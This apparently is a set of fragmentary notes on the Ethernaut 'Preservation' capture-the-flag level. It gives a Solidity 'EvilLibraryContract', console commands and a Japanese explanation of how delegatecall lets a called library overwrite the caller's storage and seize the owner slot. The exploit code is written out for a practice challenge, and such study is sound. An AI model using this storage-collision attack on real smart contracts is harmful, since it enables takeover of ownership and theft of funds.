address public timeZone1Library;
// stores a timestamp
// change the timeZone1Library to evil contract address
uint storedTime;
function setTime(uint _time) public {
storedTime = _time;
}
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract EvilLibraryContract {
address public timeZone1Library;
address public timeZone2Library;
address public owner;
function setTime(uint _time) public {
owner = msg.sender;
}
}
await contract.setFirstTime(<evil-library-contract-address>)
await contract.setFirstTime(1)
意図せずstorage領域が書き換えられてしまう2大パターン - 女子高生になりたい
DelegateCall: Calling Another Contract Function in Solidity
Ethernaut Lvl 16 Preservation Walkthrough: How to inject malicious contracts with delegatecall
delegatecall実行元のコントラクトをA、呼び出し先のコントクトをBとしたとき、Bが指すStorage領域はAのものになるんです。